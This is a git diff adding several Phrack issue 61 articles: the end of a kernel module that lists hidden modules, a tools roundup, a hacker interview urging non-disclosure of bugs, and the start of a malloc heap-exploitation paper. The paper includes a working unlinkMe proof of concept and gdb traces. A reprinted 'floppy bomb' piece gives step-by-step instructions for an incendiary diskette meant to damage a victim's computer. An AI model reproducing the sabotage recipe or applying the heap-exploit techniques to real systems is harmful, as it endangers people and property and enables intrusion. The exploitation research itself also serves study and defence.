+#include <asm/fixmap.h>
+#include <asm/page.h>
+
+static int errno;
+
+
+int valid_addr(unsigned long address)
+{
+    unsigned long page;
+
+    if (!address)
+        return 0;
+
+    page = ((unsigned long *)0xc0101000)[address >> 22];        
+
+    if (page & 1)
+    {
+        page &= PAGE_MASK;
+        address &= 0x003ff000;
+        page = ((unsigned long *) __va(page))[address >> PAGE_SHIFT];  //pte
+        if (page)
+            return 1;
+    }
+    
+    return 0;
+}
+
+ssize_t
+showmodule_read(struct file *unused_file, char *buffer, size_t len, loff_t *off)
+{
+    struct module *p;
+
+    printk("address                         module\n\n");
+    for (p=(struct module *)VMALLOC_START; p<=(struct \
+module*)(VMALLOC_START+VMALLOC_RESERVE-PAGE_SIZE); p=(struct module \
+*)((unsigned long)p+PAGE_SIZE))
+    {
+        if (valid_addr((unsigned long)p+ (unsigned long)&((struct \
+module *)NULL)->name) && valid_addr(*(unsigned long *)((unsigned long)p+ \
+(unsigned long)&((struct module *)NULL)->name)) && strlen(p->name))
+            if (*p->name>=0x21 && *p->name<=0x7e && (p->size < 1 <<20))
+                printk("0x%p%20s size: 0x%x\n", p, p->name, p->size);
+    }
+
+    return 0;
+}
+
+static struct file_operations showmodules_ops = {
+    read:    showmodule_read,
+};
+
+int init_module(int x)
+{
+    struct proc_dir_entry *entry;
+
+    entry = create_proc_entry("showmodules", S_IRUSR, &proc_root);
+    entry->proc_fops = &showmodules_ops;
+
+    return 0;
+}
+
+void cleanup_module()
+{
+    remove_proc_entry("showmodules", &proc_root);
+}
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("madsys<at>ercist.iscas.ac.cn");
+-----END MODULE-HUNTER.C-----
+
+|=-----------------------------------------------------------------------=|
+|=-=[ 7 - Good old floppy bombs ]=---------------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+    [ Note by the editors: We felt like it's time for a re-print of
+      some already forgotton fun with pyro techniques. Enjoy. ]
+
+                    ####################################
+                    #   How To Make A Diskette Bomb    #
+                    #       by Phrick-A-Phrack         #
+                    ####################################
+
+Before I even start i want to make it clear that i do NOT take any
+responsibility on the use of the information in this document.
+
+This little baby is good to use to stuff up someones computer a little.
+It can be adapted to a range of other things.
+
+You will need:
+
+- A disk (3.5" floppys are a good disk to use)
+- Scissors
+- White or blue kitchen matches (i have not found any other colors that
+  work - im not sure why)
+- Clear nail polish
+
+What to do:
+ 
+- Carefully open up the diskette
+- remove the cotton covering from the inside.
+- scrape a lot of match powder into a bowl (use a woodent scraper as metal
+  might spark and ignite the match powder)
+- After you have a lot, spread it EVENLY on the disk.
+- Spread nail polish over the match powder on the disk.
+- let it dry.
+- carefully put the diskette back together and use the nail plish to seal
+  is shut.
+
+How to use it:
+
+Give it to someone you want to give a fright and stuff up their computer
+a little. Tell them its got something they are interested in on it. When
+they put it in their drive the drive head attempts to read the disk which
+causes a small fire - enough heat to melt the disk drive and stuff the
+head up!
+
+       ^^Phrick-A-Phrack^^
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/4.txt b/phrack61/4.txt
new file mode 100644
index 0000000..779552d
--- /dev/null
+++ b/phrack61/4.txt
@@ -0,0 +1,105 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x04 of 0x0f
+
+|=------------------=[ T O O L Z   A R M O R Y ]=------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------=[ Phrack  Staff ]=-----------------------------=|
+
+
+    This new section, Phrack Toolz Armory, is dedicated to tool
+annoucements. We will showcast selected tools of relevance to the computer
+underground which have been released recently.
+
+Drop us a mail if you develop something kewl that you think is worth of
+being mentioned in #62.
+
+
+Content:
+
+     1 - Scapy, Interactive Packet Manipulation Program    by Biondi
+     2 - ShellForge, Shellcode Builder                     by Biondi
+     3 - objobf : burneye2 IA32 object file obfuscator     by team-teso
+     4 - ELFsh, ELF objects manipulation scripting langage by Devhell labs.
+     5 - Packit, Network injection, capture and auditing   by D. Bounds
+
+
+----[ 1 - Scapy : interactive packet manipulation program
+
+URL     : http://www.cartel-securite.fr/pbiondi/scapy.html
+Author  : biondi@cartel-securite.fr
+Comment : Scapy is a powerful interactive packet manipulation tool, packet
+          generator, network scanner, network discovery tool, and packet
+          sniffer. It provides classes to interactively create packets or
+          sets of packets, manipulate them, send them over the wire, sniff
+          other packets from the wire, match answers and replies, and
+          more. Interaction is provided by the Python interpreter, so
+          Python programming structures can be used (such as variables,
+          loops, and functions). Report modules are possible and easy to
+          make. It is able to do about the same things as ttlscan,
+          nmap, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof,
+          firewalk, irpas, tethereal, tcpdump, etc.
+
+          Here are some techniques that you can use it for : port,
+          protocol, network scans, arp cache poisonning, dns poisonning,
+          DoSing, nuking, sniffing etherleaking, icmpleaking, firewalking,
+          NAT discovery, fingerprinting, etc.
+
+
+----[ 2 - ShellForge : shellcode builder
+
+URL     : http://www.cartel-securite.fr/pbiondi/shellforge.html
+Author  : biondi@cartel-securite.fr
+Comment : ShellForge is a kit that builds shellcodes from C.
+          It is inspired from Stealth's Hellkit. This enables to
+          create very complex shellcodes (see example which scans ports).
+          C header files are included that provide macros to substitute
+          libc calls with direct system calls and an Python script
+          automates compilation, extraction, encoding and tests.
+
+
+----[ 3 - objobf : burneye2 IA32 object file obfuscator
+
+URL     : http://www.team-teso.net/projects/objobf/
+Author  : teso@team-teso.net
+Comment : Objobf is part of the burneye2 binary security suite. It is an ELF
+          relocatable object file obfuscation program. While still a beta
+          release it works well on smaller object files and can significantly
+          increase the time for manual decompilation. Within the downloadable
+          tarball there are some examples. Besides obfuscation it does limited
+          code and dataflow analysis and displays them in high quality graphs,
+          using the free xvcg or the propietary aiSee graphing tools.
+          Full sourcecode of the objobf tool is available at the above URL.
+
+
+----[ 4 - ELFsh 0.51b2 portable : ELF objects manipulation scripting language
+
+URL      : http://elfsh.devhell.org
+           http://elfsh.segfault.net (mirror)
+Author   : elfsh@devhell.org
+Comments : ELFsh is an interactive and scriptable ELF machine to play with
+           executable files, shared libraries and relocatable ELF32
+           objects. It is useful for daily binary manipulations such as
+           on-the-fly patching, embedded code injection, and binary
+           analysis in research fields such as reverse engineering,
+           security auditing and intrusion detection. ELFsh is based on
+           libelfsh, so that the API is really useable in opensource
+           projects. This version works on 2 architectures (INTEL, SPARC)
+           and 4 OS (Linux, FreeBSD, NetBSD, Solaris).
+
+----[ 5 - Packit : Network injection, capture and auditing tool
+
+URL      : http://packit.sf.net
+Author   : Darren Bounds <dbounds@intrusense.com>
+Comments : Packit (Packet toolkit) is a network auditing tool. Its value is
+           derived from its ability to customize, inject, monitor, and
+           manipulate IP traffic. By allowing you to define (spoof) nearly
+           all TCP, UDP, ICMP, IP, ARP, RARP, and Ethernet header options,
+           Packit can be useful in testing firewalls, intrusion
+           detection/prevention systems, port scanning, simulating network
+           traffic, and general TCP/IP auditing. Packit is also an
+           excellent tool for learning TCP/IP. It has been successfully
+           compiled and tested to run on FreeBSD, NetBSD, OpenBSD, MacOS X
+           and Linux.
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack61/5.txt b/phrack61/5.txt
new file mode 100644
index 0000000..f40bb32
--- /dev/null
+++ b/phrack61/5.txt
@@ -0,0 +1,344 @@
+phrack.org:~# cat .bash_history
+
+                            ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x04 of 0x0f
+
+|=---------------=[ P R O P H I L E   O N   D I G I T ]=-----------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ Phrack Staff ]=-----------------------------=|
+
+
+|=---=[ Specification
+
+                  Handle: DiGiT
+                     AKA: digit, eskimo, icemonkey
+           Handle origin: its not a funny story
+               catch him: digit@security.is
+        Age of your body: 22
+             Produced in Reykjavik, Iceland
+         Height & Weight: 192cm, 80kg
+                    Urlz: none
+               Computers: 2 laptops, 3 intel machines, indigo II, and a
+                          sparc station
+               Member of: smapika international
+                Projects: Mostly just stuff for my work and school related
+                          things. 
+
+|=---=[ Favorite things
+
+
+          Women: brunettes, blondes, and I prefer they have charisma,
+                 ambition, independence, intelligence, sense of humor
+           Cars: German of course ;>
+          Foods: Italian, asian
+        Alcohol: beer, vodka/coke
+          Music: trance/techno, rock, classical
+        Movies: Pianist, godfather, Dune, LOTR, Bad boy bubby, Happiness
+Books & Authors: 
+           Urls: 
+         I like: Achiving my goals, honesty, integrity, wachyness
+     I dislike: Waking up very early in the morning, constant rain, stuck
+                in an office all day, fake people
+
+|=---=[ Life in 3 sentences
+
+
+No fear. Never give up. Never surrender.
+
+
+|=---=[ Passions | What makes you tick
+
+    I like to set myself some sort of goal and try to achieve that within
+a certain amount of time. Being able to be my own boss is probably my
+greatest passion. I don't like to take orders and I value my independence
+greatly and the ability to do whatever I want is pretty important to me.
+
+    In the past I basically quit everything to do almost nothing but
+computers/inet/hacking. I did that since I was around 16 until I was 20. I
+audited code around the clock, hacking, wrote exploits, and chatted with my
+friends on irc from dusk till dawn basically.
+
+    The biggest experience for me was probably meeting the people that I
+did and the influence they had on me to improve myself. I probably have
+meeting antilove/RawPower and crazy-b at the top of my list with regards to
+that and they both really influenced me a lot and they probably provided me
+with my greatest experience with regards to hacking.
+
+
+|=---=[ Which research have you done or which one gave you the most fun?
+
+    None much more than any other. Whenever I found some bug or something
+that I knew was unknown and the satisfaction of exploiting it was a lot of
+fun.
+
+--=[ Memorable Experiences
+
+    I will never forget getting run over by a bus when I was 14 and having
+to stay in a hospital for 3 months and the frequent trips for another year
+afterwards pretty much is something I will never forget. Also the fact that
+the longest strike of Icelandic highschool teachers in icelandic history
+was happening at the exact same time I was stuck in a bed in a hospital.
+
+    Installing my first Linux system(back in '94 i think) and thinking that
+the installation floppy shell prompt from the slackware distro was
+basically a full installation of slackware ;> I had hardly any previous
+experience with Linux at the time.
+
+    Spending an absurd amount of time at my computer doing crazy stuff for
+no other reason other than to get the get the best rush imaginable.
+
+    Meeting crazy-b for the first time on the same system we were both
+hacking and then deciding to meet on irc and becoming friends in the
+process.
+
+    When crazy-b had to go into the norwegian army he wrote a small program
+that was a rudimentary irc client that piped input from an irc channel to a
+script that sent an sms to his phone with the input and also him being able
+to send an email to his address that piped the content of the mail to the
+irc channel. This way he could still irc from his mobile phone despite
+being in the army ;> 
+
+    Meeting the great antilove back in '97 and getting some private samba
+warez ;>
+
+    Having antilove visit Iceland twice and doing lots of cool stuff with
+him like rollerblading, hunting for smapika, acting stupid, him teaching me
+how to lockpick, finding new bugs, writing exploits, teaching me how to
+bluebox, etc.
+
+    Totally destroying my car when me and antilove were driving to a kfc in
+2001 because some girl ran a red light at about 80km/h in the morning and
+then laughing about it the entire day for some reason.
+
+    All the security.is weekends with the exploits we wrote and the bugs
+that we found together and with the trademark security.is hamburgers as
+made by portal.
+
+    Having lots of fun with mikasoft and ga when they visited Iceland for
+new years a few years ago and especially when mikasoft was teaching yoga at
+a new years eve dinner my family was throwing. Also the duck liver pat was
+disgusting.
+
+    Going to France with Icelandic friends and meeting a lot of hackers in
+Paris and having like 10 guys sleeping in the smallest room you could
+imagine. Then taking a cool train trip from Paris to montpellier and
+meeting a lot of other hackers and just totally invading montpellier and
+taking over an internet cafe for a week ;> Also hanging out at the beech
+with the amazingly cool french guys and starting a fire and drinking beer
+and listening to good music.
+
+    Going to the club La Dune on our FIRST night in montpellier with all
+the french hackers/etc and buying a lot of champagne for everyone and
+antilove and nitro buying a ton of vodka for a group of like 20 people and
+just partying the entire night and watching all the non french people make
+total asses of themselves.
+
+    Same night at La dune I will never forget witnessing Candypimp going
+beserk after drinking way too much and trying to jump into the ocean and
+then disapeering. we called the police to search for an 'insane' drunk
+Icelandic person that couldn't speak english anymore and who thought he was
+in his home city of Akureyri and not 50km away from montpellier and
+probably even didn't know where we were staying!
+
+    JimJones was really drunk that night too and he passed out on some tree
+before waking up again and deciding to take a piss. He went into some ditch
+and somehow he managed to piss all over himself! If I remember correctly
+me, nitro, and antilove had to remove his clothes that night because he was
+too drunk to do it himself. He was then called pissman for the duration of
+the trip ;> 
+
+    Going to Las vegas with Starcon for blackhat and defcon and actually
+PAYING for blackhat but I only went to 1 speech(halvars) because my brother
+took the time to come down from Seattle to visit me.
+
+    Going to defcon and seeing how amazingly commercial and fake it really
+is. Just look at the shit being sold there and all those stupid t-shirt
+stands.
+
+    The coolest thing about defcon was the K2 party where a lot of people
+were hanging out and it was a very memorable night and I had nice talks
+with a lot of cool people.
+
+    A recent jimjones visit to Iceland where we really didn't do anything
+except relax and drink beer and eat some BBQ. We also enjoyed a very nice
+viewing of bad boy bubby which I recommend to anyone that wants a good
+laugh and some insight into the world of jimjones(based on his lifes story).
+
+
+|=---=[ Open Interview
+
+[can give as much detailed answers here as you like]
+
+Q: When did you start to play with computers?
+A: I was probably around 12 years old when I got my first real computer.
+
+Q: When did you had your first contact to the 'scene'?
+A: Boy... I guess it is probably sometime in 1995 and I got involved with
+   some "hackers" doing some questionable things ;> I think I started off
+   by joining #hack on IRCnet and also #shells on efnet(ehrm! ;>)
+
+Q: When did you for your first time connect to the internet?
+A: Was at my school when I was probably around 13 years old and we had a
+   2400 baud modem and some old dial up program called kermit, i think,
+   that we used to call some line at the Icelandic university. It was
+   basically just a direct connection to a hp-ux box and someone tought me
+   how to use ircii and so basically my first experience with the Internet
+   was also my first time with irc.
+
+Q: What other hobbies do you have?
+A: I like to do stuff with my friends,go see movies, fish, read, go out for
+   drinks, and just anything that comes up.
+
+Q: ...and how long did it take until you joined irc? Do you remember
+   the first channel you joined?
+A: Again this was not very far between since I started irc pretty much the
+   same time. I believe the first channel I joined was #iceland.
+
+Q: What's your architecture / OS of choice?
+A: Im so used to intel so I really can't pick anything else and Linux is
+   still my preferred OS although i have netbsd here somewhere.
+
+Q: What do you think about anti.security.is and non-disclosure?
+A: anti security was a good idea but ultimately it was a failure. The
+   reason it failed was that the people that supported none-disclosure and
+   took part in antisec discussions were constantly arguing amongst
+   themselves about a lot of stuff some of which was for good reasons but
+   also stuff that was totally out there and eventually it lead to antisec
+   dying.
+
+   I personally believe that none-disclosure is the way to go and I have
+   believed that for some time now. I don't judge people that disclose
+   because I remember disclosing bugs/exploits at one point and so I am not
+   really in a position to flame people that continue to do so. 
+
+   I mean antisec also had some stupid information in some areas
+   specifcally about the true reasons behind antisec were not to create
+   some greater security in the world or something like that which was
+   mentioned in the FAQ and we took a lot of crap for. It was to keep
+   security research where it belongs, with those that actually did it and
+   at most a small tight knit group. That basically meant that people that
+   found bugs, wrote exploits, and hacked wanted to keep their
+   exploits/research private so that they had some nice private warez for
+   some time ;>
+
+   Full disclosure is for equally selfish reasons because it really boils
+   down to two things: fame and money. People think, rightly so, that by
+   releasing bugs or exploits that they become recognized among their peers
+   and that might eventually lead to a job in security or something like
+   that. People that say they release bugs/exploits for the good of the
+   world or something like that are full of shit. 
+
+Q: What do you think about the right of other 'research' groups to forbid
+   other organizations the use of their exploits ("Copyright on exploits")?
+A: Seriously who would care about a copyright header on some exploit?
+   People would use it anyways.
+
+
+Q: What do you thing about full-disclosure. Is it important or dangerous?
+A: I know I don't like it and there are a lot of good reasons why it sucks.
+   It ruins bugs! ;> And there are some negative "world issues" because
+   every hacker that wants to make a name for himself will try to write an
+   exploit for it and subsequently release it. Maybe he doesn't release
+   directly to BUGTRAQ but he gives it to lots of "friends" which leak it
+   of course and soon enough its everywhere. 
+
+   What happens next is that every script kiddie and some more advanced
+   script kiddies will use the exploit and deface sites, ruin stuff, and
+   then soon a worm will appear. I do not personally have anything against
+   those things per se but I'm sure a lot of people do. If the
+   vulnerability is unknown or kept private such things would not happen.
+
+   Full disclosure can definetly be really dangerous and we all know that
+   the people that discover bugs in software aren't on some quest to secure
+   software for the good of the world. They do it for themselves. Also why
+   should hackers do the job for software companies and even if they
+   publish they risk getting sued or something? I also hate all those full
+   disclosure policies that say you need to give a vendor a month or
+   something before publishing and all the other stupid rules.
+   My advice: don't disclose - avoid the hassle.
+
+   I do however agree to some of the arguments about the necessity of full
+   disclosure. I can't remember any right now so forget that but ultimately
+   full disclosure of any vulnerability is the fuel the drives the
+   information security companies that don't care about anything except
+   their bottom line. 
+
+
+Q: If you see or hear about various protection meassures against hackers
+   such as grsecurity, PaX, Owl or strong encryption (SSH, SSL or IPSec)
+   do you think hacking will still be possible in the future? What kind of
+   vulnerabilities will people focus on in the future?
+A: If we assume that all these programs are successful in stopping most
+   buffer overflow attacks and it has become 'impossible' to evade these
+   programs then just new types of vulnerabilities will be discovered.
+   Logic bugs in programs are just as dangerous as buffer overflows and so
+   hacking will of course be possible in the future the only thing that
+   will change are the vulnerabilities and the methods.
+
+Q: How do you feel when yet another XSS vulnerability hits the media?
+   (Do you have a regex covering XSS postings in your spam filter?)
+A: blah
+
+Q: What will hacking in the future look like? More complicated or easier?
+A: no idea.
+
+Q: You have been in the scene for quite a while. If you look back, what
+   was the worst thing that happened to the scene? What was the best 
+   that happened?
+A: This "scene" always comes up. I never followed any specific scene or
+   anything. I was just chatting with my friends and hacking with them and
+   that was about it. Although I guess the commericialization of everything
+   in the scene was probably the worst thing that happened. Didn't bugtraq
+   get sold for millions of dollars? A mailing list! And companies buying 
+   exploits how low can u get?  
+
+Q: If you could turn the clock backwards, what would you do different
+   in your young life ?
+A: My young life? Portal calls me grandpa. I guess I would go back a few
+   years into the past and avoid losing contact with my old friends.
+
+
+=---=[ One word comments
+
+[give a 1-word comment to each of the words on the left]
+
+Digital Millennium Copyright Act (DMCA): blabla 
+security.is                            : sleeping
+Georges. W. BUSH                       : war
+Companies buying exploits from hackers : silly
+IRC                                    : burp
+Hacker meetings                        : colorful
+Full Disclosure Policy                 : pseudo
+anti.security.is                       : dead
+Whitehats                              : dingdong
+
+
+|=---=[ Any suggestions/comments/flames to the scene and/or specific people?
+
+Do what you want to do and don't let anyone control you.
+
+
+|=---=[ The future of the computer underground
+
+    What is the computer underground anyways? People talk about it as if it
+were some very formal and controlled thing or something. The computer
+underground as I understand it basically just consists of various groups
+and places people hang out at and talk and do stuff together in small
+seperate groups. I have no idea where it is gona go in the future.
+
+
+|=---=[ Shoutouts & Greetings
+
+
+I wana send a big hello to:
+
+security.is, antilove(miss u bro), crazy-b(beware of hermaphrodites),
+cleb(rest in peace man), old ADM pals, JimJones, old #hax guys! stealth,
+sk8(freesk8.org), mikasoft, ga, ace24, ig-88, ghettodxm, scut, horizon,
+duke, cheez, starcon, lkm, nitro, bawd, wtf, kewl, joey,
+Synner/m0nty/Kod/Jackal(crazy greeks) and everyone of my other old friends
+that I haven't talked to in years.
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/6.txt b/phrack61/6.txt
new file mode 100644
index 0000000..4692926
--- /dev/null
+++ b/phrack61/6.txt
@@ -0,0 +1,2467 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x06 of 0x0f
+
+|=--------------[ Advanced Doug lea's malloc exploits ]-----------------=|
+|=----------------------------------------------------------------------=|
+|=-----------------------[ jp <jp@corest.com> ]-------------------------=|
+|=----------------------------------------------------------------------=|
+
+1 - Abstract
+2 - Introduction
+3 - Automating exploitation problems
+4 - The techniques
+    4.1 - aa4bmo primitive
+        4.1.1 - First unlinkMe chunk
+        4.1.1.1 - Proof of concept 1: unlinkMe chunk
+        4.1.2 - New unlinkMe chunk
+    4.2 - Heap layout analysis
+        4.2.1 - Proof of concept 2: Heap layout debugging 
+    4.3 - Layout reset - initial layout prediction - server model
+    4.4 - Obtaining information from the remote process
+        4.4.1 - Modifying server static data - finding process' DATA
+        4.4.2 - Modifying user input - finding shellcode location
+            4.4.2.1 - Proof of concept 3 : Hitting the output
+        4.4.3 - Modifying user input - finding libc's data
+            4.4.3.1 - Proof of concept 4 : Freeing the output
+        4.4.4 - Vulnerability based heap memory leak - finding libc's DATA
+    4.5 - Abusing the leaked information
+        4.5.1 - Recognizing the arena
+        4.5.2 - Morecore
+            4.5.2.1 - Proof of concept 5 : Jumping with morecore
+        4.5.3 - Libc's GOT bruteforcing
+            4.5.3.1 - Proof of concept 6 : Hinted libc's GOT bruteforcing
+        4.5.4 - Libc fingerprinting
+        4.5.5 - Arena corruption (top, last remainder and bin modification)
+    4.6 - Copying the shellcode 'by hand'
+5 - Conclusions
+6 - Thanks
+7 - References
+
+Appendix I - malloc internal structures overview
+
+---------------------------------------------------------------------------
+
+--[ 1. Abstract
+
+This paper details several techniques that allow more generic and reliable
+exploitation of processes that provide us with the ability to overwrite
+an almost arbitrary 4 byte value at any location.
+Higher level techniques will be constructed on top of the unlink() basic
+technique (presented in MaXX's article [2]) to exploit processes which
+allow an attacker to corrupt Doug Lea's malloc (Linux default's dynamic
+memory allocator).
+unlink() is used to force specific information leaks of the target process
+memory layout. The obtained information is used to exploit the target
+without any prior knowledge or hardcoded values, even when randomization
+of main object's and/or libraries' load address is present.
+
+Several tricks will be presented along different scenarios, including:
+    * special chunks crafting (cushion chunk and unlinkMe chunk)
+    * heap layout consciousness and analysis using debugging tools
+    * automatically finding the injected shellcode in the process memory
+    * forcing a remote process to provide malloc's internal structures
+     addresses
+    * looking for a function pointer within glibc
+    * injecting the shellcode into a known memory address
+
+The combination of these techniques allows to exploit the OpenSSL 'SSLv2
+Malformed Client Key Buffer Overflow' [6] and the CVS 'Directory double
+free' [7] vulnerabilities in a fully automated way (without hardcoding
+any target based address or offset), for example.
+
+---------------------------------------------------------------------------
+
+--[ 2. Introduction
+
+Given a vulnerability which allows us to corrupt malloc's internal
+structures (i.e. heap overflow, double free(), etc), we can say it
+'provides' us with the ability to perform at least an 'almost arbitrary 4
+bytes mirrored overwrite' primitive (aa4bmo from now on).
+We say it's a 'mirrored' overwrite as the location we are writing at
+minus 8 will be stored in the address given by the value we are writing
+plus 12. Note we say almost arbitrary as we can only write values that are
+writable, as a side effect of the mirrored copy. 
+The 'primitive' concept was previously introduced in the 'Advances in
+format string exploitation' paper [4] and in the 'About exploits writing'
+presentation [5].
+Previous work 'Vudo - An object superstitiously believed to embody magical
+power' by Michel 'MaXX' Kaempf [2] and 'Once upon a free()' [3] give fully
+detailed explanations on how to obtain the aa4bmo primitive from a
+vulnerability. At [8] and [9] can be found the first examples of malloc
+based exploitation.
+We'll be using the unlink() technique from [2] as the basic lower level
+mechanism to obtain the aa4bmo primitive, which we'll use through all the
+paper to build higher level techniques.
+
+                   malloc                         higher
+vulnerability  ->  structures  ->  primitive  ->  level
+                   corruption                     techniques
+---------------------------------------------------------------------------
+heap overflow         unlink()                       freeing the output
+double free()  ->  technique   ->  aa4bmo     ->  hitting the output
+...                                               cushion chunk
+                                                  ...
+
+This paper focuses mainly on the question that arises after we reach the
+aa4bmo primitive: what should we do once we know a process allows us to
+overwrite four bytes of its memory with almost any arbitrary data?
+In addition, tips to reach the aa4bmo primitive in a reliable way are 
+explained.
+
+Although the techniques are presented in the context of malloc based
+heap overflow exploitation, they can be employed to aid in format string
+exploits as well, for example, or any other vulnerability or combination
+of them, which provide us with similar capabilities.
+
+The research was focused on the Linux/Intel platform; glibc-2.2.4,
+glibc-2.2.5 and glibc-2.3 sources were used, mainly the file malloc.c
+(an updated version of malloc can be found at [1]). Along this paper we'll
+use 'malloc' to refer to Doug Lea's malloc based implementation.
+
+---------------------------------------------------------------------------
+--] 3. Automating exploitation problems
+
+When trying to answer the question 'what should we do once we know we can
+overwrite four bytes of the process memory with almost any arbitrary
+data?', we face several problems:
+
+A] how can we be sure we are overwriting the desired bytes with the 
+desired bytes?
+As the aa4bmo primitive is the underlying layer that allows us to
+implement the higher level techniques, we need to be completely sure it is
+working as expected, even when we know we won't know where our data will
+be located. Also, in order to be useful, the primitive should not crash
+the exploited process.
+
+B] what should we write?
+We may write the address of the code we intend to execute, or we may
+modify a process variable. In case we inject our shellcode in the 
+process, we need to know its location, which may vary together with the
+evolving process heap/stack layout.
+
+C] where should we write?
+Several known locations can be overwritten to modify the execution flow,
+including for example the ones shown in [10], [11], [12] and [14].
+In case we are overwriting a function pointer (as when overwriting a stack
+frame, GOT entry, process specific function pointer, setjmp/longjmp,
+file descriptor function pointer, etc), we need to know its precise location.
+The same happens if we plan to overwrite a process variable. For example,
+a GOT entry address may be different even when the source code is the
+same, as compilation and linking parameters may yield a different process
+layout, as happens with the same program source code compiled for 
+different Linux distributions.
+
+Along this paper, our examples will be oriented at overwriting a function
+pointer with the address of injected shellcode. However, some techniques
+also apply to other cases.
+
+Typical exploits are target based, hardcoding at least one of the values
+required for exploitation, such as the address of a given GOT entry,
+depending on the targeted daemon version and the Linux distribution and
+release version. Although this simplifies the exploitation process, it is
+not always feasible to obtain the required information (i.e. a server can
+be configured to lie or to not disclose its version number). Besides, we
+may not have the needed information for the target. Bruteforcing more than
+one exploit parameter may not always be possible, if each of the values
+can't be obtained separately.
+There are some well known techniques used to improve the reliability
+(probability of success) of a given exploit, but they are only an aid for
+improving the exploitation chances. For example, we may pad the shellcode
+with more nops, we may also inject a larger quantity of shellcode in the
+process (depending on the process being exploited) inferring there are
+more possibilities of hitting it that way. Although these enhancements
+will improve the reliability of our exploit, they are not enough for an
+exploit to work always on any vulnerable target. In order to create a
+fully reliable exploit, we'll need to obtain both the address where our
+shellcode gets injected and the address of any function pointer to
+overwrite.
+
+In the following, we discuss how these requirements may be accomplished in
+an automated way, without any prior knowledge of the target server. Most
+of the article details how we can force a remote process to leak the
+required information using aa4bmo primitive.
+
+---------------------------------------------------------------------------
+--] 4. The techniques
+
+--] 4.1 aa4bmo primitive 
+
+--] 4.1.1 First unlinkMe chunk
+
+In order to be sure that our primitive is working as expected, even in
+scenarios where we are not able to fully predict the location of our
+injected fake chunk, we build the following 'unlinkMe chunk':
+
+
+ -4        -4      what     where-8    -11      -15      -19    ...
+|--------|--------|--------|--------|--------|--------|--------|...
+ sizeB    sizeA    FD       BK
+ ----------- nasty chunk -----------|--------|-------------------->
+                                            (X)
+
+We just need a free() call to hit our block after the (X) point to
+overwrite 'where' with 'what'.
+
+When free() is called the following sequence takes place:
+
+- chunk_free() tries to look for the next chunk, it takes the chunk's
+  size (<0) and adds it to the chunk address, obtaining always the sizeA
+  of the 'nasty chunk' as the start of the next chunk, as all the sizes
+  after the (X) are relative to it.
+
+- Then, it checks the prev_inuse bit of our chunk, but as we set it (each
+  of the sizes after the (X) point has the prev_inuse bit set, the
+  IS_MMAPPED bit is not set) it does not try to backward consolidate
+  (because the previous chunk 'seems' to be allocated).
+
+- Finally, it checks if the fake next chunk (our nasty chunk) is free. It
+  takes its size (-4) to look for the next chunk, obtaining our fake
+  sizeB, and checks for the prev_inuse flag, which is not set. So, it
+  tries to unlink our nasty chunk from its bin to coalesce it with the
+  chunk being freed.
+
+- When unlink() is called, we get the aa4bmo primitive. The unlink()
+  technique is described in [2] and [3].
+
+--] 4.1.1.1 Proof of concept 1: unlinkMe chunk
+
+We'll use the following code to show in a simple way the unlinkMe chunk in
+action:
+
+#define WHAT_2_WRITE  0xbfffff00
+#define WHERE_2_WRITE 0xbfffff00
+#define SZ            256
+#define SOMEOFFSET    5 + (rand() % (SZ-1))
+#define PREV_INUSE    1
+#define IS_MMAP       2
+int main(void){
+   unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof(unsigned long));
+   int i = 0;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = WHAT_2_WRITE;
+   unlinkMe[i++] = WHERE_2_WRITE-8;
+   for(;i<SZ;i++){
+      unlinkMe[i] = ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE ;
+   }
+   free(unlinkMe+SOMEOFFSET);
+   return 0;
+}
+
+Breakpoint 3, free (mem=0x804987c) at heapy.c:3176
+
+     if (mem == 0)    /* free(0) has no effect */
+3181      p = mem2chunk(mem);
+3185      if (chunk_is_mmapped(p))    /* release mmapped memory. */
+
+We did not set the IS_MMAPPED bit.
+
+3193      ar_ptr = arena_for_ptr(p);
+3203      (void)mutex_lock(&ar_ptr->mutex);
+3205      chunk_free(ar_ptr, p);
+
+After some checks, we reach chunk_free().
+
+(gdb) s
+chunk_free (ar_ptr=0x40018040, p=0x8049874) at heapy.c:3221
+
+Let's see how does our chunk looks at a random location...
+
+(gdb) x/20x p
+0x8049874:      0xfffffd71      0xfffffd6d      0xfffffd69      0xfffffd65
+0x8049884:      0xfffffd61      0xfffffd5d      0xfffffd59      0xfffffd55
+0x8049894:      0xfffffd51      0xfffffd4d      0xfffffd49      0xfffffd45
+0x80498a4:      0xfffffd41      0xfffffd3d      0xfffffd39      0xfffffd35
+0x80498b4:      0xfffffd31      0xfffffd2d      0xfffffd29      0xfffffd25
+
+We dumped the chunk including its header, as received by chunk_free().
+
+3221      INTERNAL_SIZE_T hd = p->size; /* its head field */
+3235      sz = hd & ~PREV_INUSE;
+
+(gdb) p/x hd
+$5 = 0xfffffd6d
+(gdb) p/x sz
+$6 = 0xfffffd6c
+
+3236      next = chunk_at_offset(p, sz);
+3237      nextsz = chunksize(next);
+
+
+Using the negative relative size, chunk_free() gets the next chunk, let's
+see which is the 'next' chunk:
+
+(gdb) x/20x next
+0x80495e0:      0xfffffffc      0xfffffffc      0xbfffff00      0xbffffef8
+0x80495f0:      0xfffffff5      0xfffffff1      0xffffffed      0xffffffe9
+0x8049600:      0xffffffe5      0xffffffe1      0xffffffdd      0xffffffd9
+0x8049610:      0xffffffd5      0xffffffd1      0xffffffcd      0xffffffc9
+0x8049620:      0xffffffc5      0xffffffc1      0xffffffbd      0xffffffb9
+
+(gdb) p/x nextsz
+$7 = 0xfffffffc
+
+It's our nasty chunk...
+
+3239      if (next == top(ar_ptr))    /* merge with top */
+3278      islr = 0;
+3280      if (!(hd & PREV_INUSE))   /* consolidate backward */
+
